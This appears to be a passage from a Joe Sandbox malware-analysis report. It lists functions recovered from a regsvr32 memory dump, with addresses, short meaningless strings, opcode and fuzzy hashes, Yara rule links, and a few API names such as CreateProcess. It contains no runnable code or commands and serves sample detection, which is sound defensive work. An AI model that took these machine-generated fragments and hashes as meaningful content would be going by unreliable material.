Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: */$I$Yu$(
API String ID: 0-674225443
Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
Instruction ID: a295da282c58d0f45a3c2008693f04ed7c48c3b342830e2f20272594f80479fb
Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
Instruction Fuzzy Hash: 72718DB190070ACFDB58CF68D48A5DE7FB0FB68398F204219F85596260D7B49AA5CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 007314D4 Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

#X, xrefs: 00731535
W, xrefs: 00731581
PYq|, xrefs: 00755812
.:, xrefs: 007557E4

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$.:$PYq|$W
API String ID: 0-626586655
Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
Instruction ID: 9accd9b29948f2ba704f0ef6b43165ebc28eba98451dd88659277c166b7bda7d
Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
Instruction Fuzzy Hash: 7841E37061CB858FD7A8DF28D58A65BBBF0FBD9704F804A1EF589C7250DB7998048B42

Uniqueness

Uniqueness Score: -1.00%

Function 0073A660 Relevance: 5.1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

Strings

<ml, xrefs: 0073A697
P, xrefs: 0073A670
5`, xrefs: 0073A677
a:, xrefs: 0073A76D

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5`$<ml$a:$P
API String ID: 0-330785107
Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
Instruction ID: 3800f61d0189c0f3ba110cd30ce8afb42e3c81808e94467df65051d480e4e5d0
Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
Instruction Fuzzy Hash: C941F4B190074E8BDB4CDF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00744A90 Relevance: 5.1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

Strings

S, xrefs: 00744B8E
0u, xrefs: 00744AA7
e!, xrefs: 00744BE7
-+, xrefs: 00744B75

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -+$0u$S$e!
API String ID: 0-4217091389
Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
Instruction ID: 21333cb55570fba61ead478d555be2cf97ee8d0bb5591760fdc2d1cb1a8e7c11
Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
Instruction Fuzzy Hash: 4441E3B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00733274 Relevance: 5.1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

Strings

wU, xrefs: 0073335D
SJ, xrefs: 00733292
o, xrefs: 007332EB
"B, xrefs: 007332CE

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: o$"B$SJ$wU
API String ID: 0-691100934
Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
Instruction ID: f8ebb9d09f118da40760ec4d0a0c81fef07765976798fe6f718a46ae72584cff
Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
Instruction Fuzzy Hash: 8E41E0B180078ECFDB48CF68C88A5DEBBF0FB58358F104619E859A6254D3B89695CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00731B94 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

=2y}, xrefs: 00731CEE
9luJ, xrefs: 00731BF8
=2y}, xrefs: 00731CF9
b, xrefs: 00731C2E

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 9luJ$=2y}$=2y}$b
API String ID: 0-1667874806
Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
Instruction ID: 8a2c245cd1d33ff3e49584b9ba65031cf653155a1ac17c846e1eb5cb28c52a06
Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
Instruction Fuzzy Hash: E241D6B181038EDFDF44CF64D88A4CE7BB0FB18358F110A19F865A62A4D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 007348FC Relevance: 4.0, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

fdu, xrefs: 00734ACA
;, xrefs: 00734BE0
O,, xrefs: 00734938

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;$O,$fdu
API String ID: 0-1721916326
Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
Instruction ID: 41fd30cfdef22359591c661e631470774039f0396d910ecd634da2f607cae6fc
Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
Instruction Fuzzy Hash: 23A10371D14718EBDB5CDFA8E8C999EBBB1FB54314F00421AE806A72A1CB78A945CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00733E0C Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

&v, xrefs: 00733EC8
u, xrefs: 00733EF1
f, xrefs: 00733E35

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: u$&v$f
API String ID: 0-1868853588
Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
Instruction ID: ab88caf7bb86d76a1e0afcd148e09488b7f343faccb6e9dc348cc2a3ba839a7f
Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
Instruction Fuzzy Hash: C3713471D04709EBDB1CDFA8E5C919DBBB1FB44314F10412DE416A72A1CB789945CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0074E750 Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

j, xrefs: 0074E86D
t, xrefs: 0074E908
o, xrefs: 0074E8F8

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: o$j$t
API String ID: 0-2067604139
Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
Instruction ID: 8d88195890027ef21b502b0be079548475bed57d8a4e69fcacc8c54fda8909b1
Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
Instruction Fuzzy Hash: 0F61EF705087848BD768DF28C18A55FBBF1FBC6704F104A1DE68A9B2A0D77AD844CB43

Uniqueness

Uniqueness Score: -1.00%

Function 0074D5F0 Relevance: 3.8, Strings: 3, Instructions: 96COMMON

Download Yara Rule

Strings

P, xrefs: 0074D6C4
KGRa, xrefs: 0074D70C
wy, xrefs: 0074D66F

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: P$KGRa$wy
API String ID: 0-4077564265
Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
Instruction ID: e67063a49b9a6773debea9c56a07d7d9f7750ca38b8f4544f15262a293e21417
Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
Instruction Fuzzy Hash: F241C0B090074A8BDF48CF68C8865DE7FB0FB68348F51461DE84AA6290D37896A4CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 00748BB8 Relevance: 3.8, Strings: 3, Instructions: 96COMMON

Download Yara Rule

Strings

N@`Y, xrefs: 00748C7D
=, xrefs: 00748D0C
`Y, xrefs: 00748BCF

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =$N@`Y$`Y
API String ID: 0-2183226064
Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
Instruction ID: 7ac51709a089332b97f694898c87138605217839b3d47701a2fcca0a2fefd023
Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
Instruction Fuzzy Hash: 3551C2B190074E8FDB44CF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 0074EAC0 Relevance: 3.8, Strings: 3, Instructions: 86COMMON

Download Yara Rule

Strings

~?, xrefs: 0074EB85
\, xrefs: 0074EACC
'0, xrefs: 0074EBFD

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '0$~?$\
API String ID: 0-629757258
Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
Instruction ID: 84f2d81bda0b252865636818e550008d1eca5e84af041749ca159cd552e989f8
Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
Instruction Fuzzy Hash: F741CEB0548B808BE718CF28C59A51ABBF1FBC5344F604A2DF6968A3A0D774D885CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0073DCB8 Relevance: 3.8, Strings: 3, Instructions: 80COMMON

Download Yara Rule

Strings

~*b, xrefs: 0073DD03
A7, xrefs: 0073DD24
z, xrefs: 0073DD83

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: A7$z$~*b
API String ID: 0-275545515
Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
Instruction ID: 8c617503316829237258fe3884cc044a343a17b4d6b70982d7054a648ba2e3f4
Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
Instruction Fuzzy Hash: D341C4B180074ECFDB48CF64C48A5DE7FB0FB64398F204619E855A6250D3B896A9CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0073A7F0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON

Download Yara Rule

Strings

rTk=, xrefs: 0073A831
H, xrefs: 0073A8C6
{,%, xrefs: 0073A85C

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: H$rTk=${,%
API String ID: 0-3174111592
Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
Instruction ID: 098befeb913c2e597e771e1fd630b20a73017df7a5e47bad055fbe828ba1442e
Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
Instruction Fuzzy Hash: 1731E970528785ABD798DF28C4CA91EBBE1FBC4354F906A1CF5C2862A1C779D445CB03

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B878 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 000000018000BAC7
RaiseException.KERNEL32 ref: 000000018000BAD8

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010DB0 Relevance: 3.0, APIs: 2, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

ZwOpenSymbolicLinkObject.NTDLL ref: 0000000180010DBB
ZwOpenSymbolicLinkObject.NTDLL ref: 0000000180010DD3

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: LinkObjectOpenSymbolic
String ID:
API String ID: 3706036087-0
Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704

Uniqueness

Uniqueness Score: -1.00%

Function 00743FD0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

D?", xrefs: 00744246
8zfK, xrefs: 0074451B

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: D?"$8zfK
API String ID: 0-617590365
Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
Instruction ID: 2228e79c484956accb9c5151e3ebfbff804322fa4625dd7bb206a413294715f6
Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
Instruction Fuzzy Hash: 2C12F2B550560DCBDB68DF38C48A49E3BE1FF58304F205129FC269B2A2D774D964CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0073C078 Relevance: 2.9, Strings: 2, Instructions: 384COMMON

Download Yara Rule

Strings

#X, xrefs: 0073C564
h}, xrefs: 0073C778

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$h}
API String ID: 0-3021649463
Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
Instruction ID: 64e35d32618ed556758d7fb4b6d6747306be72dc100f1a9f2967f67973df2116
Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
Instruction Fuzzy Hash: A22296709096888BEBF9DF24C889AD97BF0FF44704F90251ED84EAA650DB7C6645CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00759910 Relevance: 2.8, Strings: 2, Instructions: 322COMMON

Download Yara Rule

Strings

#X, xrefs: 00759941
+ <, xrefs: 00759A2E

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$+ <
API String ID: 0-1007305072
Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
Instruction ID: 76955c5bc4ec5e5675efab1de2e59f961e26cbcd4d0d055ebd4a64a130198000
Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
Instruction Fuzzy Hash: 440278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0074B460 Relevance: 2.8, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

Hc, xrefs: 0074B853
aYG, xrefs: 0074B648

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Hc$aYG
API String ID: 0-2147329803
Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
Instruction ID: 01fbaf48f275129e93a6e32bf10c0af99fce7d321f3c87ecf35433a8b1b63a7f
Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
Instruction Fuzzy Hash: 90D1117560170DCBDB68CF28C58A59E3BE9FF54308F504129FC1E862A5D7B8E829CB46

Uniqueness

Uniqueness Score: -1.00%

Function 007333D4 Relevance: 2.8, Strings: 2, Instructions: 276COMMON

Download Yara Rule

Strings

Ip, xrefs: 00733906
2/, xrefs: 00733729

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Ip$2/
API String ID: 0-2558650176
Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
Instruction ID: 34efac784f560ff468e9cac59e7019d94d27884e93f4820627d7cdb6ae297361
Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
Instruction Fuzzy Hash: F8E1C471505B888FEBB8DF24CC99BEB7BA0FB44306F20551AD849DE290DB785685CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00734214 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

h, xrefs: 0073432B
j-`, xrefs: 0073444F

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: h$j-`
API String ID: 963392458-2572860821
Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
Instruction ID: ca7ba3d67c873a10d3801fbe2177a2ad1f88d3b2d5ceb278fba2c161527f32ac
Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
Instruction Fuzzy Hash: C2C1E371904788CFDF6CDFA8C88A59DBBB1FB58308F20421DE916AB661DBB49845CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00746C70 Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

#z, xrefs: 00746FB0
UP, xrefs: 00746CED

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #z$UP
API String ID: 0-3609392360
Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
Instruction ID: c1fb44543fa92a274cc6504c4d568c05777e9b98bd1801879c5314bd0faf0d79
Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
Instruction Fuzzy Hash: 9CA13771904609DBDF58DFA8E4CA49EBBB0FB64344F20451DF846A72A0CB789995CFC2

Uniqueness

Uniqueness Score: -1.00%

Function 007594BC Relevance: 2.7, Strings: 2, Instructions: 194COMMON

Download Yara Rule

Strings

z~, xrefs: 007594EB
)bkr, xrefs: 007595CD

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )bkr$z~
API String ID: 0-4035444816
Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
Instruction ID: 9521b67ba0c50b9f928b5e6dc2ed5c0f2243a51fd3ea7106f73ff16657ca37bf
Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
Instruction Fuzzy Hash: 0C817C71514789CFEBB88F28CC8A7D937A0FB45314F608219DD8ECA291DFB85A4D9B41

Uniqueness

Uniqueness Score: -1.00%

Function 0074EC30 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

NM, xrefs: 0074EF7F
aK>, xrefs: 0074EF0B

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: aK>$NM
API String ID: 0-1076587397
Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
Instruction ID: bdc74719ecc616cda6e387f08f908814f8fa6bc420b14134507f307f58b36bba
Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
Instruction Fuzzy Hash: E3B144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A1E3B5E614CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0074662C Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

cy5X, xrefs: 007469F9
GcX, xrefs: 00746734

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GcX$cy5X
API String ID: 0-3427037236
Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
Instruction ID: 46a54a7028a90f90ab8c06a4d6a5d6ee546049df270cb43c62a1cf61b3b27170
Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
Instruction Fuzzy Hash: EDA1C7B0548388CBEBBEDF34D89A6D93BA9FB44704F504619E80E8E290DF745745CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0073AC94 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

&, xrefs: 0073AF3E
U, xrefs: 0073AF25

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &$U
API String ID: 0-326847644
Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
Instruction ID: fa7e975f921b9fbf1657bac7617bf385ac792ae4eca269386bdd8ff9fdb8818c
Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
Instruction Fuzzy Hash: 199169B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00745A00 Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

z5, xrefs: 00745C39
k' {, xrefs: 00745C91

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: k' {$z5
API String ID: 0-3484172565
Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
Instruction ID: cf276cbed6f1726c8a7aa603958485cee85067b48a1f64949bf0d6d71bf807d3
Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
Instruction Fuzzy Hash: B471F770600749CFDB48DF28C88A5DE7BA1FB58348F114329EC8AAB251D778D954CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0073AAB8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

D, xrefs: 0073AC1C
6, xrefs: 0073AAEC

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6$D
API String ID: 0-3309211938
Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
Instruction ID: 2861088462c5be5e35d5194bee842517ee56e006db859bca736c89369c04e7cb
Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
Instruction Fuzzy Hash: 17512D70524789ABDB98CF28DC8A9993BA4FB15304F90626DFD86C7252C778D886CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00737530 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

(Pv0, xrefs: 0073768B
#T, xrefs: 007375B2

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #T$(Pv0
API String ID: 0-2531358951
Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
Instruction ID: 7ac9ba4d3f2d2747e3cbd0d14ae099be98b6cd5d2b6c1b915bf8818493bbe5e3
Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
